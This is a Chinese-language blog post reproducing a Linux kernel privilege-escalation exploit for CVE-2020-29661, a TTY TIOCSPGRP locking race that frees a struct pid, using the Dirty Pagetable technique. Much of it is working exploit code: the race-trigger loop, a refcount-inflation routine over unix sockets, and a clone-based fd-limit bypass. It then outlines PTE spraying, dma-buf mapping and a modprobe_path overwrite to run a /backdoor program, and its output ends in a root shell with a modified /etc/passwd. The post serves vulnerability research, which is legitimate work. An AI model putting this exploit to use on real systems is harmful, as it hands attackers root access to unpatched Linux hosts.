序
在阅读Dirty Pagetable: A Novel Exploitation Technique To Rule Linux Kernel这篇文章时发现并没有对CVE-2020-29661这个漏洞的利用手法做太详细的介绍,在网上也没找到详细的公开exp,唯一一篇首次提出该漏洞的作者的exp也由于一些原因无法正常利用成功,因此博主考虑自己结合相关资料对该漏洞通过Dirty Pagetable
方法进行复现。
复现环境及源码仓库:https://github.com/TLD1027/CVE-2020-29661
patch
diff --git a/drivers/tty/tty_jobctrl.c b/drivers/tty/tty_jobctrl.c
index 28a23a0fef21c3..baadeea4a289bf 100644
--- a/drivers/tty/tty_jobctrl.c
+++ b/drivers/tty/tty_jobctrl.c
@@ -494,10 +494,10 @@ static int tiocspgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t
if (session_of_pgrp(pgrp) != task_session(current))
goto out_unlock;
retval = 0;
- spin_lock_irq(&tty->ctrl_lock);
+ spin_lock_irq(&real_tty->ctrl_lock);
put_pid(real_tty->pgrp);
real_tty->pgrp = get_pid(pgrp);
- spin_unlock_irq(&tty->ctrl_lock);
+ spin_unlock_irq(&real_tty->ctrl_lock);
out_unlock:
rcu_read_unlock();
return retval;
spin_lock_irq
进行了加锁处理,但是put_pid
的对象是real_tty
,上锁的对象是tty
ioctl(fd1, TIOCSPGRP, pid_A) ioctl(fd2, TIOCSPGRP, pid_B)
spin_lock_irq(...) spin_lock_irq(...)
put_pid(old_pid)
put_pid(old_pid)
real_tty->pgrp = get_pid(A)
real_tty->pgrp = get_pid(B)
spin_unlock_irq(...) spin_unlock_irq(...)
ioctl(fd1, TIOCSPGRP, pid_A) ioctl(fd2, TIOCSPGRP, pid_B)
spin_lock_irq(...) spin_lock_irq(...)
put_pid(old_pid)
put_pid(old_pid)
real_tty->pgrp = get_pid(A)
real_tty->pgrp = get_pid(B)
spin_unlock_irq(...) spin_unlock_irq(...)
old_pid
的引用计数被额外减一,造成pid
结构体被违规释放,构造pid
结构体的uaf
漏洞利用
Dirty Pagetable
的方法,首先我们需要先利用cross-cache
将漏洞结构体所在的slab
回收,因为pid
结构体分配通过kmem_cache
实现的,是专用缓存,一开始我尝试喷pid
但是发现有两个问题,第一个是由于为了保证fork
出来的进程可以在需要的时候被释放我采用了在共享内存中设置标志位,这也就意味着子进程需要执行死循环一直去检查标志位是否被标记,当fork
大量的子进程后会导致资源占用过多,耗时过长,第二个问题是释放时使用wait
处理时也可能出现一直等待的情况,很难判定是因为释放数量太多造成了释放缓慢还是进程被锁死,因此查看首次提出该漏洞的作者的文章:
https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html
阅读后我发现在作者的exp里面他采用了seq_file
/*
* The child pid should be in a page together with a bunch of seqfiles
* allocations and nothing else.
*/
int seqfiles[32*2];
for (int i=0; i<32; i++)
seqfiles[i] = SYSCHK(open("/proc/self/maps", O_RDONLY));
slab alias
机制的影响,导致他们从同一个slab
中分配,因此只需要打开/proc/self/maps
就能实现堆喷的目的,但是如果要cross cache
我们需要先触发漏洞将pid
释放掉,但是如何来判断条件竞争是否是成功了呢?
struct pid
with multiple dangling references:1.Allocate a new
struct pid
(by creating a new task).2.Create a large number of references to it (by sending messages with
SCM_CREDENTIALS
to unix domain sockets, and leaving those messages queued up).3.Repeatedly trigger the
TIOCSPGRP
race to skew the reference count downwards, with the number of attempts chosen such that we expect that the resulting refcount skew is bigger than the number of references we need for the rest of our attack, but smaller than the number of extra references we created.4.Let the task owning the
pid
exit and die, and wait for RCU (read-copy-update, a mechanism that involves delaying the freeing of some objects) to settle such that the task's reference to thepid
is gone. (Waiting for an RCU grace period from userspace is not a primitive that is intentionally exposed through the UAPI, but there are various ways userspace can do it - e.g. by testing when a released BPF program's memory is subtracted from memory accounting, or by abusing themembarrier(MEMBARRIER_CMD_GLOBAL, ...)
syscall after the kernel version where RCU flavors were unified.)5.Create a new thread, and let that thread attempt to drop all the references we created.
Because the refcount is smaller at the start of step 5 than the number of references we are about to drop, the
pid
struct upid { int nr; struct pid_namespace *ns; }; struct pid { atomic_t count; unsigned int level; /* lists of tasks that use this pid */ struct hlist_head tasks[PIDTYPE_MAX]; struct rcu_head rcu; struct upid numbers[1]; }; [...] void put_pid(struct pid *pid) { struct pid_namespace *ns; if (!pid) return; ns = pid->numbers[pid->level].ns; if ((atomic_read(&pid->count) == 1) || atomic_dec_and_test(&pid->count)) { kmem_cache_free(ns->pid_cachep, pid); put_pid_ns(ns); } }
) of the freed object with an XOR-obfuscated freelist pointer; therefore, the
count
andlevel
fields are now effectively random garbage. This means that the load frompid->numbers[pid->level]
will now be at some random offset from thepid
, in the range from zero to 64 GiB. As long as the machine doesn't have tons of RAM, this will likely cause a kernel segmentation fault. (Yes, I know, that's an absolutely gross and unreliable way to exploit this. It mostly works though, and I only noticed this issue when I already had the whole thing written, so I didn't really want to go back and change it... plus, did I mention that it mostly works?)Linux in its default configuration, and the configuration shipped by most general-purpose distributions, attempts to fix up unexpected kernel page faults and other types of "oopses" by killing only the crashing thread. Therefore, this kernel page fault is actually useful for us as a signal: Once the thread has died, we know that the object has been freed, and can continue with the rest of the exploit.
If this code looked a bit differently and we were actually reaching a double-free, the SLUB allocator would also detect that and trigger a kernel oops (see
set_freepointer()
for theCONFIG_SLAB_FREELIST_HARDENED
pid->numbers[pid->level]
中的pid—>level
会被修改成一个极大的随机值,第一个挑战就是这个寻址不会寻址到一个不可读的空间,也就是说空间要足够大,同时,通过这个方法获取到的值ns
kmem_cache_free(ns->pid_cachep, pid);
put_pid_ns(ns);
pid_cachep
得是一个内核堆地址,这样才能成功通过kmem_cache_free
另外再看put_pid_ns
void put_pid_ns(struct pid_namespace *ns)
{
struct pid_namespace *parent;
while (ns != &init_pid_ns) {
parent = ns->parent;
if (!kref_put(&ns->kref, free_pid_ns))
break;
ns = parent;
}
}
uaf
被触发的,那么根据这个函数大概就能猜到应该是while
的结束条件没有被满足,那么第三个挑战就需要这个ns->parent
刚刚好是一个循环链表并且整个链表的所有元素都不满足结束的条件,综合上面的分析,我姑且认为原作者的exp仅仅能在理论条件下实现或者实现的概率极低,那么我们需要找到新的方法来检查pid
结构体是否触发uaf
了。
在组长的启发下,确实找到了一个更简单更快捷的办法来判断结构体是否被释放了,那就是通过getpid
去检查进程号。首先观察可以发现条件竞争时子进程的refcount
初始值是2,那么如果竞争成功并且作用于子进程,就会导致子进程在一轮竞争后就已经被释放掉了,这时如果我们立刻fork
一个新的进程,他就会占用原本子进程的pid
并更新进程号,也就是说,我们只需要检查子进程的进程号是否发生改变就能判断这个pid
for(child_i = 0; child_i < MAX_FORK_NUM; child_i++)
{
pid_t child = SYSCHK(fork());
if (child == 0)
{
SYSCHK(prctl(PR_SET_PDEATHSIG, SIGKILL));
pin_cpu(1);
SYSCHK(setpgid(0, 0));
child = getpid();
for (int attempts = 0; attempts < SKEW_ATTEMPTS; attempts++)
{
while (1)
{
char syncval = *syncptr;
if ((syncval & 1) == 0)
{
if (syncval == 10)
break;
*syncptr = syncval + 1;
}
}
SYSCHK(ioctl(tty, TIOCSPGRP, &parent));
*syncptr = 11;
}
while(1)
{
if(*(syncptr + child_i + 0x100) == 1)
{
if(getpid() == child){
*(syncptr + child_i + 0x100) = 2; // continue
while(1){
if(*(syncptr + child_i + 0x100) == 4)
{
*(syncptr + child_i + 0x200) = 1; // exit the new fork;
exit(0);
}
}
}
else{
printf("[*] child : %d, new-child : %d\n", child, getpid());
*(syncptr + child_i + 0x100) = 3; // find the uaf pid
while(1){
if(*(syncptr + child_i + 0x100) == 4) {
printf("[*] Free the uaf pid again\n");
*(syncptr + child_i + 0x200) = 1; // exit the new fork;
while(1)
{
if(*(syncptr + child_i + 0x100) == 10)
{
SYSCHK(listen(listensock, 128));
*(syncptr + child_i + 0x100) = 9;
}
}
}
}
}
}
}
}
for (int attempts = 0; attempts < SKEW_ATTEMPTS; attempts++)
{
SYSCHK(ioctl(ptmx, TIOCSPGRP, &child));
*syncptr = 0;
while (1)
{
char syncval = *syncptr;
if ((syncval & 1) == 1)
{
*syncptr = syncval + 1;
if (syncval == 9)
break;
}
}
SYSCHK(ioctl(ptmx, TIOCSPGRP, &parent));
while (*syncptr != 11)
;
}
int fack = fork();
if(fack == 0)
{
while(1){
if(*(syncptr + child_i + 0x200) == 1) exit(0);
}
}
*(syncptr + 0x100 + child_i) = 1;
while(1)
{
if(*(syncptr + child_i + 0x100) == 2)
{
break;
}else if(*(syncptr + child_i + 0x100) == 3)
{
break;
}
}
if(*(syncptr + child_i + 0x100) == 3)
{
printf("[*] Find the uaf pid in child : %d\n", child_i);
break;
}
}
pid
结构体,接下来就是常规的cross cache
操作,然后喷大量的PTE
页表去占用这个有pid
结构体的slab
。
由于pid
被释放了我们要想在不引起kernel panic
的情况下对pid
进行处理就只能通过递增refcount
的方式,因此我们需要在PTE
页表的每一个可能对应pid
的refcount
struct pid {
refcount_t count; /* 0 4 */
unsigned int level; /* 4 4 */
spinlock_t lock; /* 8 4 */
/* XXX 4 bytes hole, try to pack */
struct hlist_head tasks[4]; /* 16 32 */
struct hlist_head inodes; /* 48 8 */
wait_queue_head_t wait_pidfd; /* 56 24 */
/* --- cacheline 1 boundary (64 bytes) was 16 bytes ago --- */
struct callback_head rcu; /* 80 16 */
struct upid numbers[]; /* 96 0 */
/* size: 96, cachelines: 2, members: 8 */
/* sum members: 92, holes: 1, sum holes: 4 */
/* last cacheline: 32 bytes */
};
PTE
refcount
的时候就可以通过观察对应的虚拟地址的值是否改变来判断漏洞pid
结构体对应的虚拟地址,这里我们采用了原作者提到的方法实现对refcount
void add_to_refcount(int count, int listensock)
{
for (int i = 0; i < count; i++)
{
int refsock = SYSCHK(socket(AF_UNIX, SOCK_STREAM, 0));
SYSCHK(connect(refsock, (struct sockaddr *)&unix_addr, sizeof(unix_addr)));
SYSCHK(accept(listensock, NULL, NULL) == -1);
}
}
4096
,但是我们一次就需要递增至少0x1000
才能实现篡改PTE
指向下一个物理地址,因此我们需要通过子进程来绕过这个限制。因为每个进程打开的文件描述符有限,但是如果我们可以创建很多子进程就能在子进程中继续增加引用计数来绕过限制。
我首先用最简单的方式,我fork
了一个子进程去增加引用计数,但是很快就出现了报错,显示已经达到了限制,我怀疑是子进程的数量不够,因此我选择fork
了更多的进程,还是提示达到限制,于是我直接调试发现,不管我开了多少进程,都会达到一个瓶颈值,我查询资料发现这是因为fork
会继承父进程的文件描述符,这就导致这种方法行不通,但是我发现clone
也能创建子进程并且还可以选择不继承文件描述符
,于是尝试用clone
的方式递增,果然成功实现了对PTE
int child_func(void *arg) {
int num = *((int *)arg);
add_to_refcount(num, listensock);
sleep(1);
while (1) {}
}
int main()
{
...
char *stack;
char *stack_top;
#define STACK_SIZE (1024 * 1024)
// 为子进程分配栈空间
stack = malloc(STACK_SIZE);
if (stack == NULL) {
perror("malloc");
exit(EXIT_FAILURE);
}
stack_top = stack + STACK_SIZE;
int flags = SIGCHLD;
// 创建子进程
int times = 0x400;
clone(child_func, stack_top, flags | SIGCHLD, ×);
...
}
定位到漏洞对象记录的PTE
对应的用户地址后,我们可以利用累加操作将PTE
指向其他物理地址,但是由于mmap
分配的物理地址与内核代码的物理地址和页表页的物理地址不是连续的且我们只有递增原语没有递减原语,因此我们利用dma-buf
|-------|
| ... |
|-------|
| PTE |
|-------|
| DMA |
|-------|
| PTE |
|-------|
| ... |
|-------|
PTE
页表页映射到用户空间的目的,因此大致流程为:
1.分配10个用户页表
2.利用递增原语构造同一物理页映射到不同的虚拟页找到addr1
3.回收addr1
对应的页面,在addr1
处分配dma-buf
共享页
4.分配10个用户页表
5.利用递增原语构造将dma-buf
对应的物理地址修改为页表页地址并映射到虚拟地址addr1
中
6.读取addr1
判断是否映射成功,成功后将addr1
对应的值加0x1000
使得原本的虚拟地址addr3
对应的物理页映射到addr2
中,并沿用前面的方式找到addr2
至此我们已经构造出了一个可控的页表页addr1
和他对应映射的虚拟页addr2
,此时我们可以从起始地址开始遍历物理空间,通过在读取addr2
中的信息来判断是否找到了内核基址对应的物理基址,找到物理基址后继续遍历寻找modprobe_path
的物理地址,直接修改其对应的程序为/backdoor
程序,并执行/error
触发执行/backdoor
修改/etc/passwd
,或者也可以通过直接patch内核代码段来实现逃逸。
实现效果
[+] Boot took 2.05
[*] starting up...
[*] Increased fd limit from 1024 to 4096
[*] prepare PTE memory...
[*] executing in first level child process, setting up session and PTY pair...
[*] Begin cc1
[*] Begin cc2
[*] Begin cc3
[*] Launching child process
[*] child : 149, new-child : 150
[*] Find the uaf pid in child : 2
[*] Begin cc4
[*] UAF pid id : 2
[*] Free the uaf pid
[*] Free the uaf pid again
[*] Free finish
[*] Free the struct around uaf pid
[*] Free the struct in first 30 page
[*] Finish cc !
[*] spraying 10 pte's...
[*] spraying finish
[*] Find the pte in 0x10000290000, value 0x100002a0000
[*] Start dma
[*] dma_buf_fd : 7
[*] Start to unmap
[*] spraying finish
[*] Find the dma in 0x10000290000, pte-value 0x800000013fe6a067
[*] Find the pte-1 in 0x10001400000, value 0x10001c00000
[+] pte: 0x8000000050c00067 NUMBER TAG: 0xe801403f51258d48
[*] modprobe path: /sbin/modprobe
[*] setting physical address range to 0x8000000050c00067 - 0x8000000050e00067
[*] setting physical address range to 0x8000000050e00067 - 0x8000000051000067
[*] setting physical address range to 0x8000000051000067 - 0x8000000051200067
[*] setting physical address range to 0x8000000051200067 - 0x8000000051400067
[*] setting physical address range to 0x8000000051400067 - 0x8000000051600067
[*] setting physical address range to 0x8000000051600067 - 0x8000000051800067
[*] setting physical address range to 0x8000000051800067 - 0x8000000051a00067
[*] setting physical address range to 0x8000000051a00067 - 0x8000000051c00067
[*] setting physical address range to 0x8000000051c00067 - 0x8000000051e00067
[*] setting physical address range to 0x8000000051e00067 - 0x8000000052000067
[*] setting physical address range to 0x8000000052000067 - 0x8000000052200067
[*] modprobe path : /sbin/modprobe
[-] false positive. skipping to next one
[*] setting physical address range to 0x8000000052200067 - 0x8000000052400067
[*] setting physical address range to 0x8000000052400067 - 0x8000000052600067
[*] setting physical address range to 0x8000000052600067 - 0x8000000052800067
[*] setting physical address range to 0x8000000052800067 - 0x8000000052a00067
[*] setting physical address range to 0x8000000052a00067 - 0x8000000052c00067
[*] setting physical address range to 0x8000000052c00067 - 0x8000000052e00067
[*] setting physical address range to 0x8000000052e00067 - 0x8000000053000067
[*] setting physical address range to 0x8000000053000067 - 0x8000000053200067
[*] setting physical address range to 0x8000000053200067 - 0x8000000053400067
[*] setting physical address range to 0x8000000053400067 - 0x8000000053600067
[*] setting physical address range to 0x8000000053600067 - 0x8000000053800067
[*] setting physical address range to 0x8000000053800067 - 0x8000000053a00067
[*] setting physical address range to 0x8000000053a00067 - 0x8000000053c00067
[*] setting physical address range to 0x8000000053c00067 - 0x8000000053e00067
[*] setting physical address range to 0x8000000053e00067 - 0x8000000054000067
[*] setting physical address range to 0x8000000054000067 - 0x8000000054200067
[*] setting physical address range to 0x8000000054200067 - 0x8000000054400067
[*] modprobe path : /backdoor
[*] Found modprobe path at physical address 0x0000010001446aa0
/error: line 1: ����: not found
[*] flag : flag{test_flag_ujdbqwdwklqdmwqkldj}
/ $ su root
/ # id
uid=0 gid=0(root) groups=0(root)
/ # cat /etc/passwd
root::0:0:root:/root:/bin/sh
ctf:x:1000:1000:chal:/home/ctf:/bin/sh
/ #
非特殊说明,本博所有文章均为博主原创。
如若转载,请注明出处:https://he.tld1027.com/2024/09/23/cve-2020-29661%e5%a4%8d%e7%8e%b0/
共有 0 条评论